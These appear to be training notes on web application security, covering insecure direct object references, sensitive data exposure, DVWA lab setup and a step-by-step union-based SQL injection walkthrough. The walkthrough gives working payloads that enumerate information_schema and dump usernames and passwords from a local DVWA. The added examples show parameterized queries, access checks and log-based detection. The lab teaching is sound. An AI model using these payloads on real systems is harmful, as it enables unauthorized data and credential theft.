How to Use SQL Injection Attack Tutorial In Web Applications

SESSION 10
==========

METHODS USED IN WEB APPLICATIONS
================================
1. GET – Requests data from a specified resource. It is the insecure method: the parameters travel in the URL, so all data transmitted from the web application UI to its server or database is visible.
e.g. php?id=1, ?cat=54, ?test=query.

2. POST – Sends the data to the server or database in the request body instead of the URL, so it is hidden from view. e.g. twitter.com/login.php

———————————————————-

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or database key. Without an access control check or other protection, attackers can directly access unsecured files, configurations and settings; this access is neither authorized nor validated by the administrator.

For example:

CHJM Website:

Accessing another user's account –
www.chjm.org/login/…/php?id=1411 (ALEX)
www.chjm.org/login/../php?id=1411 (entered into Logan’s account)

Accessing pages which a basic user is not authorized to view –
www.chjm.org/user/../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html

E.g.: arvindsharma.com > Login
arvindsharma.com/account/login.php
arvindsharma.com/account/user.php?id=1337

URL > arvindsharma.com
/account/ > Folder
user.php > Code

1337 > Sanjeev Multani
Kshitij > 1111 > 1337 > Sanjeev’s account
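
The missing access control check, as an added example that is not part of the original notes: a handler that trusts the id from the URL beside one that compares it with the logged-in session, plus a role check for admin-only pages. The account records, session layout and function names are hypothetical; the ids 1111 and 1337 and the config page path mirror the examples above.

```python
# Constructed records; ids mirror the user.php?id= example above.
ACCOUNTS = {
    1111: {"owner": 1111, "email": "user1111@example.test"},
    1337: {"owner": 1337, "email": "user1337@example.test"},
}
ADMIN_ONLY = {"/settings/config.html"}

def view_account_vulnerable(session, requested_id):
    # Trusts the id from the URL: any logged-in user can read any account.
    return 200, ACCOUNTS.get(int(requested_id))

def view_account_checked(session, requested_id):
    if session is None:
        return 401, None                      # not logged in
    try:
        account_id = int(requested_id)        # reject ids that are not numbers
    except ValueError:
        return 400, None
    account = ACCOUNTS.get(account_id)
    is_owner = account is not None and account["owner"] == session["user_id"]
    # Same answer for "does not exist" and "not yours", so ids cannot be enumerated.
    if not is_owner and not (account and session["role"] == "admin"):
        return 404, None
    return 200, account

def view_page_checked(session, path):
    if session is None:
        return 401
    if path in ADMIN_ONLY and session["role"] != "admin":
        return 403                            # basic users never reach admin pages
    return 200
```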

———————————————————-

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Sensitive data is also expected to be encrypted: if the data is not encrypted and is in plain text, it is much easier for an attacker or any other individual to fetch it.

Types of Sensitive Data
=======================

1. Personal – Names, addresses, contact numbers etc.
2. Confidential – IDs, passwords (credentials), Aadhaar No.
3. Financial – Bank account numbers, credit cards, debit cards etc.
4. Health Information – Policies etc.

Demonstration on LVS.

———————————————————-

DVWA SETUP AND CONFIGURATION
============================
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL-based web application built for understanding the web application attacks in the OWASP Top 10, like LVS.

STEPS
=====
1. Copy the zip file into C:\xampp\htdocs.
2. Right-click the zip file and click "Extract here".
3. Start the XAMPP server, then start Apache and MySQL.
4. Go to the dvwa directory in "htdocs", navigate to the config folder, open the config.php file and set password="" (empty).
5. Open the browser and go to 127.0.0.1/dvwa.
6. It will show you the message "Click here to create the Database".
7. After clicking, your database is created; "127.0.0.1/phpmyadmin" lists all the databases.
8. Go through the Instruction Page of LVS and then start learning through it.

———————————————————-

OWASP A1. INJECTIONS
=====================

UNION BASED SQL INJECTION
=========================
Union-based SQLi is a type of attack in which an attacker enters malicious SQL queries into an input of the web application; they take effect on the database and result in the extraction of the "juicy" data.

DATABASE > TABLES > COLUMNS > ROWS

--+ : FOR ANY COMMAND I ENTER INTO THE INPUT METHOD, I HAVE TO ENTER --+ AFTER THAT TO MAKE IT A SQL QUERY.

# :

information schema

database()

version()

table_name – name of the table

column_name – name of the column

The mother of information

TERMINOLOGIES
=============
1. Information Schema: It holds the data about every database, table, column and every other detail of a database. It is considered the mother of information in a database.
2. --+ : Everything written with --+ is treated as a SQL query.
3. # : Everything entered after # is not considered.
4. database() – name of the database.
5. version() – version of the database.
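
Added example (not part of the original notes): the same lookup written with string concatenation and with a bound parameter, fed the quote input from Step 2 and the UNION input from Step 6 of the walkthrough below. SQLite stands in for MariaDB, the users rows are constructed, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in for a `users` table; SQLite replaces MariaDB here.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        ("1", "Alex", "Doe", "alex", "hash-a"),
        ("2", "Logan", "Roe", "logan", "hash-b"),
    ])
    return db

def lookup_concatenated(db, user_id):
    # Vulnerable: the input becomes part of the SQL text, so a quote ends the
    # string literal and whatever follows is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def run(lookup, user_id):
    # Returns ("rows", [...]) or ("error", message). A real handler should log
    # the message server-side instead of showing it to the client.
    db = make_db()
    try:
        return "rows", lookup(db, user_id)
    except sqlite3.Error as exc:
        return "error", str(exc)

QUOTE = "1'"
# "--+" in a URL decodes to "-- ", which starts a SQL comment and hides the
# closing quote that the application appends.
UNION = "1' union select user,password from users-- "
```

With the bound parameter both inputs are compared as plain strings against user_id and match no row; with concatenation the first raises a syntax error and the second returns the user and password columns.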

Target – http://127.0.0.1/dvwa/vulnerabilities/sqli/

STEPS – For SQLi, Firefox is always recommended, as special symbols and spaces do not get converted into URL encoding.

STEPS
======

Step 1: Find the GET method/parameter
e.g. php?id=1
?cat=24
?test=query
Try clicking every possible link, or give inputs to the search boxes that use the GET method.

"http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#"

Step 2: Check whether the site is vulnerable to Union Based SQLI
?id=1'
php?id=1'
If we get an error, that means the website is vulnerable to Union Based SQLI.

It will give – "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1"

Step 3: To check the number of columns present in the database
order by 100--+
order by 200--+
order by 300--+
Until we get an error of "Unknown Order Clause".

E.g. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause'

Step 4: Union select the columns which are present in the database and are vulnerable
union select 1,2--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#

Step 5: Extracting Information from Database
– database()
– version()
– union select version(),2--+
– union select 1,version()--+

– union select all 1,version()--+ : 10.1.25-MariaDB
– union select all 1,database()--+ : dvwa

Step 6: Calling the Mother of Database – information_schema

= Extracting Table Names
– union select all 1,table_name from information_schema.tables--+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#

= After Selecting a Juicy Table, Extracting data of that table :
– column_name, information_schema.columns

– union select all 1, column_name from information_schema.columns where table_name="users"--+

= To get the data from columns (user, password)

– union select user,password from users--+
– http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select group_concat(user,0x0a,password),2 from users--+

And we will get the Juicy Data.
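
How the steps above look from the server side, as an added example that is not part of the original notes: a scan of web access-log lines that URL-decodes each query parameter and labels it with the step it resembles. The log lines are constructed (combined log format, documentation IP ranges) and the stage names and functions are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Most specific stage first; each maps to a step of the walkthrough above.
STAGES = [
    ("schema_enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"'")),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
BASE = "/dvwa/vulnerabilities/sqli/"

# Constructed access-log lines.
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET {BASE}?id=1&Submit=Submit HTTP/1.1" 200 512',
    f'192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}?id=1%27&Submit=Submit HTTP/1.1" 200 160',
    f'192.0.2.10 - - [01/Jan/2024:10:00:20 +0000] "GET {BASE}?id=1%27%20order%20by%203--+&Submit=Submit HTTP/1.1" 200 170',
    f'192.0.2.10 - - [01/Jan/2024:10:00:41 +0000] "GET {BASE}?id=1%27%20union%20select%20all%201,table_name'
    '%20from%20information_schema.tables--+&Submit=Submit HTTP/1.1" 200 9000',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search?name=O%27Brien HTTP/1.1" 200 300',
]

def classify(value):
    """Return the first matching stage name for a decoded parameter value."""
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return None

def scan(lines):
    """Map client address -> list of (parameter, stage) hits, in log order."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes and turns '+' into a space ("--+" -> "-- ").
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            stage = classify(value)
            if stage:
                hits.setdefault(client, []).append((param, stage))
    return hits

def escalating(hits, min_stages=2):
    """A lone quote is weak evidence (O'Brien); report clients that progress."""
    return sorted(c for c, found in hits.items()
                  if len({stage for _, stage in found}) >= min_stages)
```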

——————————————————————————-

TESTING WEBSITES
================
1. http://demo.testfire.net/
2. http://testphp.vulnweb.com/
